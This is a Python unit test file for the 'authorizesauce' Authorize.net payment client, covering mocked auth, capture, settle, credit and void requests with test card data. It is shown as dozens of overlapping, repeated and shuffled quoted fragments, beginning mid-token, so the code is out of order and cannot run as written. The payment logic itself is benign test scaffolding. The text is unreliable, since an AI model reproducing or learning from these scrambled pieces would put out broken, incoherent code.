PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_capture(self,", "'1', 'response_reason_text': 'This transaction has been approved.', 'transaction_id': '2171062816', }", "'cvv_response': 'N', 'authorization_code': '000000', 'response_code': '2', 'amount': '20.00', 'transaction_type': 'auth_only',", "self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', }) params", "'2171062816', } ERROR = MockResponse( b'2;1;2;This transaction has been declined.;000000;N;2171062816;;;20.00;CC'", "Rose Ave', 'x_city': 'Venice', 'x_state': 'CA', 'x_zip': '90291', 'x_country': 'US',", "import BytesIO, binary_type, u from six.moves.urllib.parse import parse_qsl, urlencode from", "self.api._add_params({}, address=self.address) self.assertEqual(params, { 'x_address': '45 Rose Ave', 'x_city': 'Venice',", "import date from six import BytesIO, binary_type, u from six.moves.urllib.parse", "TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_connection_error(self,", "or ERROR self.year = date.today().year + 10 self.credit_card = CreditCard('4111111111111111',", "} ERROR = MockResponse( b'2;1;2;This transaction has been declined.;000000;N;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;45", "def _are_params_eq(params1, params2): _params1, _params2 = map(_unicode_str, (params1, params2)) return", "authorizesauce.data import Address, CreditCard from authorizesauce.exceptions import AuthorizeConnectionError, \\ AuthorizeResponseError", "'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&' 'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) ) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen')", "None def get_content_charset(self, failobj=None, *args, **kwargs): \"\"\"Python 3 version\"\"\" return", "'2'}) except AuthorizeResponseError as e: self.assertTrue(str(e).startswith( 'This transaction has been", "self.api.capture(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&'", "# Test with specified amount result = self.api.settle('123456', amount=10) self.assertEqual(urlopen.call_args[0][0],", "urlopen.side_effect = self.success result = self.api.void('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], (", "has been declined.', 'transaction_id': '2171062816', } def _unicode_str(s): if isinstance(s,", "urlopen.side_effect = self.success result = self.api.auth(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL)", "'4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', }) params = self.api._add_params({}, address=self.address)", "'b': '2'}) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_response_error(self, urlopen): urlopen.side_effect = self.error try:", ") self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', 'x_address':", "TransactionAPI('123', '456') self.success = lambda *args, **kwargs: SUCCESS.seek(0) or SUCCESS", "amount result = self.api.credit('1111', '123456', 10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], (", "PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_connection_error(self, urlopen): urlopen.side_effect = IOError('Borked') self.assertRaises(AuthorizeConnectionError, self.api._make_call,", "u('\\xe3')}) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen')", "**kwargs) self.headers = self.Headers() SUCCESS = MockResponse( b'1;1;1;This transaction has", "'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', }) params = self.api._add_params({},", "urlopen.side_effect = IOError('Borked') self.assertRaises(AuthorizeConnectionError, self.api._make_call, {'a': '1', 'b': '2'}) @mock.patch('authorizesauce.apis.transaction.urlopen')", "*args, **kwargs): \"\"\"Python 3 version\"\"\" return failobj def __init__(self, *args,", "self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&' 'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) ) ))", "'123456', 10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_amount=10.00' '&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE'", "import mock from authorizesauce.apis.transaction import PROD_URL, TEST_URL, TransactionAPI from authorizesauce.data", "params = {'a': '1', 'b': '2'} result = self.api._make_call(params) self.assertEqual(urlopen.call_args[0][0],", "_params1, _params2 = map(_unicode_str, (params1, params2)) return frozenset(parse_qsl(_params1)) == frozenset(parse_qsl(_params2))", "urlopen): urlopen.side_effect = self.success result = self.api._make_call({u('\\xe3'): '1', 'b': u('\\xe3')})", "= self.error try: self.api._make_call({'a': '1', 'b': '2'}) except AuthorizeResponseError as", "{ 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', 'x_address': '45 Rose", "{'a': '1', 'b': '2'}) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_response_error(self, urlopen): urlopen.side_effect =", "AuthorizeConnectionError, \\ AuthorizeResponseError class MockResponse(BytesIO): class Headers(dict): def getparam(self, *args,", "'2'}) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_response_error(self, urlopen): urlopen.side_effect = self.error try: self.api._make_call({'a':", "debug=False) self.assertEqual(api.url, PROD_URL) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call(self, urlopen): urlopen.side_effect = self.success", "TransactionAPITests(TestCase): def setUp(self): self.api = TransactionAPI('123', '456') self.success = lambda", "PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_with_unicode(self, urlopen): urlopen.side_effect = self.success result =", "self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&' 'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE'", "test_void(self, urlopen): urlopen.side_effect = self.success result = self.api.void('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL)", "BytesIO.__init__(self, *args, **kwargs) self.headers = self.Headers() SUCCESS = MockResponse( b'1;1;1;This", "*args, **kwargs): BytesIO.__init__(self, *args, **kwargs) self.headers = self.Headers() SUCCESS =", "'b': '2'} result = self.api._make_call(params) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], urlencode(params)", ")) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_connection_error(self, urlopen): urlopen.side_effect = IOError('Borked')", "lambda *args, **kwargs: SUCCESS.seek(0) or SUCCESS self.error = lambda *args,", "'&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE' '&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_credit(self, urlopen): urlopen.side_effect", "{ 'cvv_response': 'P', 'authorization_code': 'IKRAGJ', 'response_code': '1', 'amount': '20.00', 'transaction_type':", "PARSED_ERROR) def test_add_params(self): self.assertEqual(self.api._add_params({}), {}) params = self.api._add_params({}, credit_card=self.credit_card) self.assertEqual(params,", "import parse_qsl, urlencode from unittest2 import TestCase import mock from", "'911', }) params = self.api._add_params({}, address=self.address) self.assertEqual(params, { 'x_address': '45", "= lambda *args, **kwargs: ERROR.seek(0) or ERROR self.year = date.today().year", "'response_reason_text': 'This transaction has been declined.', 'transaction_id': '2171062816', } def", "amount result = self.api.settle('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B'", "= TransactionAPI('123', '456') self.success = lambda *args, **kwargs: SUCCESS.seek(0) or", "failobj def __init__(self, *args, **kwargs): BytesIO.__init__(self, *args, **kwargs) self.headers =", "_unicode_str(s): if isinstance(s, binary_type): return s.decode('unicode_escape') return s def _are_params_eq(params1,", "'&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456' '&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) # Test with specified", "if isinstance(s, binary_type): return s.decode('unicode_escape') return s def _are_params_eq(params1, params2):", "*args, **kwargs: ERROR.seek(0) or ERROR self.year = date.today().year + 10", "= date.today().year + 10 self.credit_card = CreditCard('4111111111111111', self.year, 1, '911')", "**kwargs): \"\"\"Python 3 version\"\"\" return failobj def __init__(self, *args, **kwargs):", "# Test with transaction_id, amount result = self.api.credit('1111', '123456', 10)", "def test_make_call_with_unicode(self, urlopen): urlopen.side_effect = self.success result = self.api._make_call({u('\\xe3'): '1',", ") )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_settle(self, urlopen): urlopen.side_effect =", "self.api._make_call({u('\\xe3'): '1', 'b': u('\\xe3')}) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1' ))", ")) self.assertEqual(result, PARSED_SUCCESS) # Test with specified amount result =", "failobj=None, *args, **kwargs): \"\"\"Python 3 version\"\"\" return failobj def __init__(self,", "def test_void(self, urlopen): urlopen.side_effect = self.success result = self.api.void('123456') self.assertEqual(urlopen.call_args[0][0],", "self.success result = self.api.capture(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], (", "urlopen.side_effect = self.error try: self.api._make_call({'a': '1', 'b': '2'}) except AuthorizeResponseError", "urlopen): urlopen.side_effect = self.success params = {'a': '1', 'b': '2'}", "been approved.', 'transaction_id': '2171062816', } ERROR = MockResponse( b'2;1;2;This transaction", "'CA', 'x_zip': '90291', 'x_country': 'US', }) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_auth(self, urlopen):", "from six.moves.urllib.parse import parse_qsl, urlencode from unittest2 import TestCase import", "urlopen): urlopen.side_effect = IOError('Borked') self.assertRaises(AuthorizeConnectionError, self.api._make_call, {'a': '1', 'b': '2'})", "= self.success result = self.api.capture(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'],", "from authorizesauce.exceptions import AuthorizeConnectionError, \\ AuthorizeResponseError class MockResponse(BytesIO): class Headers(dict):", "self.api.credit('1111', '123456', 10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_amount=10.00' '&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111'", "approved.', 'transaction_id': '2171062816', } ERROR = MockResponse( b'2;1;2;This transaction has", "frozenset(parse_qsl(_params1)) == frozenset(parse_qsl(_params2)) class TransactionAPITests(TestCase): def setUp(self): self.api = TransactionAPI('123',", "self.api.settle('123456', amount=10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE' '&x_tran_key=456&x_test_request=FALSE'", "s def _are_params_eq(params1, params2): _params1, _params2 = map(_unicode_str, (params1, params2))", "parse_qsl, urlencode from unittest2 import TestCase import mock from authorizesauce.apis.transaction", "from authorizesauce.apis.transaction import PROD_URL, TEST_URL, TransactionAPI from authorizesauce.data import Address,", "urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_connection_error(self, urlopen): urlopen.side_effect", "self.year = date.today().year + 10 self.credit_card = CreditCard('4111111111111111', self.year, 1,", "= Address('45 Rose Ave', 'Venice', 'CA', '90291') def test_basic_api(self): api", "'response_reason_text': 'This transaction has been approved.', 'transaction_id': '2171062816', } ERROR", "'01-{0}'.format(self.year), 'x_card_code': '911', 'x_address': '45 Rose Ave', 'x_city': 'Venice', 'x_state':", "address=self.address) self.assertEqual(params, { 'x_address': '45 Rose Ave', 'x_city': 'Venice', 'x_state':", "self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&' 'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format(", "self.assertEqual(result, PARSED_SUCCESS) # Test with specified amount result = self.api.settle('123456',", "from unittest2 import TestCase import mock from authorizesauce.apis.transaction import PROD_URL,", "Ave', 'Venice', 'CA', '90291') def test_basic_api(self): api = TransactionAPI('123', '456')", "= self.success params = {'a': '1', 'b': '2'} result =", "= {'a': '1', 'b': '2'} result = self.api._make_call(params) self.assertEqual(urlopen.call_args[0][0], TEST_URL)", "= lambda *args, **kwargs: SUCCESS.seek(0) or SUCCESS self.error = lambda", "declined.', 'transaction_id': '2171062816', } def _unicode_str(s): if isinstance(s, binary_type): return", "\"\"\"Python 3 version\"\"\" return failobj def __init__(self, *args, **kwargs): BytesIO.__init__(self,", "api = TransactionAPI('123', '456', debug=False) self.assertEqual(api.url, PROD_URL) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call(self,", "self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_amount=10.00' '&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen')", "{'a': '1', 'b': '2'} result = self.api._make_call(params) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq(", "s.decode('unicode_escape') return s def _are_params_eq(params1, params2): _params1, _params2 = map(_unicode_str,", "lambda *args, **kwargs: ERROR.seek(0) or ERROR self.year = date.today().year +", "test_make_call(self, urlopen): urlopen.side_effect = self.success params = {'a': '1', 'b':", "self.assertEqual(self.api._add_params({}), {}) params = self.api._add_params({}, credit_card=self.credit_card) self.assertEqual(params, { 'x_card_num': '4111111111111111',", "'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE' '&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_credit(self,", "'2171062816', } def _unicode_str(s): if isinstance(s, binary_type): return s.decode('unicode_escape') return", ")) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_void(self, urlopen): urlopen.side_effect = self.success", "'IKRAGJ', 'response_code': '1', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'Y', 'response_reason_code':", "1, '911') self.address = Address('45 Rose Ave', 'Venice', 'CA', '90291')", "from six import BytesIO, binary_type, u from six.moves.urllib.parse import parse_qsl,", "'&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_void(self, urlopen): urlopen.side_effect", "been declined.', 'transaction_id': '2171062816', } def _unicode_str(s): if isinstance(s, binary_type):", "params2)) return frozenset(parse_qsl(_params1)) == frozenset(parse_qsl(_params2)) class TransactionAPITests(TestCase): def setUp(self): self.api", "Ave;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_ERROR = { 'cvv_response': 'N', 'authorization_code': '000000',", "TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], urlencode(params) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_with_unicode(self,", "@mock.patch('authorizesauce.apis.transaction.urlopen') def test_credit(self, urlopen): urlopen.side_effect = self.success # Test with", "return s def _are_params_eq(params1, params2): _params1, _params2 = map(_unicode_str, (params1,", "except AuthorizeResponseError as e: self.assertTrue(str(e).startswith( 'This transaction has been declined.'", "params = self.api._add_params({}, address=self.address) self.assertEqual(params, { 'x_address': '45 Rose Ave',", "= self.success result = self.api.auth(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'],", "TEST_URL, TransactionAPI from authorizesauce.data import Address, CreditCard from authorizesauce.exceptions import", "amount=10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE' '&x_tran_key=456&x_test_request=FALSE' ))", "'x_zip': '90291', 'x_country': 'US', }) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_auth(self, urlopen): urlopen.side_effect", "'&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) ) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_settle(self, urlopen):", "Ave', 'x_city': 'Venice', 'x_state': 'CA', 'x_zip': '90291', 'x_country': 'US', })", "= self.api._make_call({u('\\xe3'): '1', 'b': u('\\xe3')}) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1'", "'456', debug=False) self.assertEqual(api.url, PROD_URL) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call(self, urlopen): urlopen.side_effect =", "api = TransactionAPI('123', '456') self.assertEqual(api.url, TEST_URL) api = TransactionAPI('123', '456',", "AuthorizeResponseError class MockResponse(BytesIO): class Headers(dict): def getparam(self, *args, **kwargs): \"\"\"Python", "transaction has been declined.;000000;N;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;45 Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_ERROR", "self.headers = self.Headers() SUCCESS = MockResponse( b'1;1;1;This transaction has been", "frozenset(parse_qsl(_params2)) class TransactionAPITests(TestCase): def setUp(self): self.api = TransactionAPI('123', '456') self.success", "test_settle(self, urlopen): urlopen.side_effect = self.success # Test without specified amount", "self.api._make_call(params) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], urlencode(params) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen')", "self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456' '&x_test_request=FALSE' )) self.assertEqual(result,", "test_make_call_with_unicode(self, urlopen): urlopen.side_effect = self.success result = self.api._make_call({u('\\xe3'): '1', 'b':", "self.success # Test without specified amount result = self.api.settle('123456') self.assertEqual(urlopen.call_args[0][0],", "return failobj def __init__(self, *args, **kwargs): BytesIO.__init__(self, *args, **kwargs) self.headers", "'01-{0}'.format(self.year), 'x_card_code': '911', }) params = self.api._add_params({}, address=self.address) self.assertEqual(params, {", "self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], urlencode(params) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def", "address=self.address ) self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911',", "six import BytesIO, binary_type, u from six.moves.urllib.parse import parse_qsl, urlencode", "'&x_trans_id=123456&x_version=3.1&x_amount=10.00' '&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_void(self, urlopen):", "binary_type): return s.decode('unicode_escape') return s def _are_params_eq(params1, params2): _params1, _params2", "six.moves.urllib.parse import parse_qsl, urlencode from unittest2 import TestCase import mock", "'x_address': '45 Rose Ave', 'x_city': 'Venice', 'x_state': 'CA', 'x_zip': '90291',", "result = self.api.capture(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&'", "def get_content_charset(self, failobj=None, *args, **kwargs): \"\"\"Python 3 version\"\"\" return failobj", "'x_card_code': '911', 'x_address': '45 Rose Ave', 'x_city': 'Venice', 'x_state': 'CA',", "self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&' 'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year)", "def getparam(self, *args, **kwargs): \"\"\"Python 2 version\"\"\" return None def", "TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&' 'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) )", "'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_amount=10.00' '&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_void(self,", "self.error = lambda *args, **kwargs: ERROR.seek(0) or ERROR self.year =", "= map(_unicode_str, (params1, params2)) return frozenset(parse_qsl(_params1)) == frozenset(parse_qsl(_params2)) class TransactionAPITests(TestCase):", "b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_SUCCESS = { 'cvv_response': 'P', 'authorization_code': 'IKRAGJ',", "@mock.patch('authorizesauce.apis.transaction.urlopen') def test_settle(self, urlopen): urlopen.side_effect = self.success # Test without", "version\"\"\" return failobj def __init__(self, *args, **kwargs): BytesIO.__init__(self, *args, **kwargs)", "'1', 'b': '2'}) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_response_error(self, urlopen): urlopen.side_effect = self.error", "= self.success # Test with transaction_id, amount result = self.api.credit('1111',", "= self.api.settle('123456', amount=10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE'", "result = self.api._make_call({u('\\xe3'): '1', 'b': u('\\xe3')}) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'],", ")) self.assertEqual(e.full_response, PARSED_ERROR) def test_add_params(self): self.assertEqual(self.api._add_params({}), {}) params = self.api._add_params({},", "*args, **kwargs: SUCCESS.seek(0) or SUCCESS self.error = lambda *args, **kwargs:", "TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456' '&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS)", "urlopen): urlopen.side_effect = self.success # Test without specified amount result", "been approved.;IKRAGJ;Y;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_SUCCESS = { 'cvv_response': 'P',", "self.api._make_call, {'a': '1', 'b': '2'}) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_response_error(self, urlopen): urlopen.side_effect", "'x_state': 'CA', 'x_zip': '90291', 'x_country': 'US', }) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_auth(self,", "has been approved.', 'transaction_id': '2171062816', } ERROR = MockResponse( b'2;1;2;This", "result = self.api.credit('1111', '123456', 10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123'", "without specified amount result = self.api.settle('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], (", "result = self.api.settle('123456', amount=10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B'", "'1', 'b': '2'} result = self.api._make_call(params) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'],", "urlopen): urlopen.side_effect = self.success result = self.api.void('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'],", "binary_type, u from six.moves.urllib.parse import parse_qsl, urlencode from unittest2 import", "str(self.year) ) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_settle(self, urlopen): urlopen.side_effect", "str(self.year) ) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_capture(self, urlopen): urlopen.side_effect", ")) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_with_unicode(self, urlopen): urlopen.side_effect = self.success", "def test_capture(self, urlopen): urlopen.side_effect = self.success result = self.api.capture(20, self.credit_card,", "return s.decode('unicode_escape') return s def _are_params_eq(params1, params2): _params1, _params2 =", "def test_make_call(self, urlopen): urlopen.side_effect = self.success params = {'a': '1',", "@mock.patch('authorizesauce.apis.transaction.urlopen') def test_auth(self, urlopen): urlopen.side_effect = self.success result = self.api.auth(20,", "from datetime import date from six import BytesIO, binary_type, u", "SUCCESS.seek(0) or SUCCESS self.error = lambda *args, **kwargs: ERROR.seek(0) or", "( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456' '&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) # Test", "params = self.api._add_params( {}, credit_card=self.credit_card, address=self.address ) self.assertEqual(params, { 'x_card_num':", "@mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_connection_error(self, urlopen): 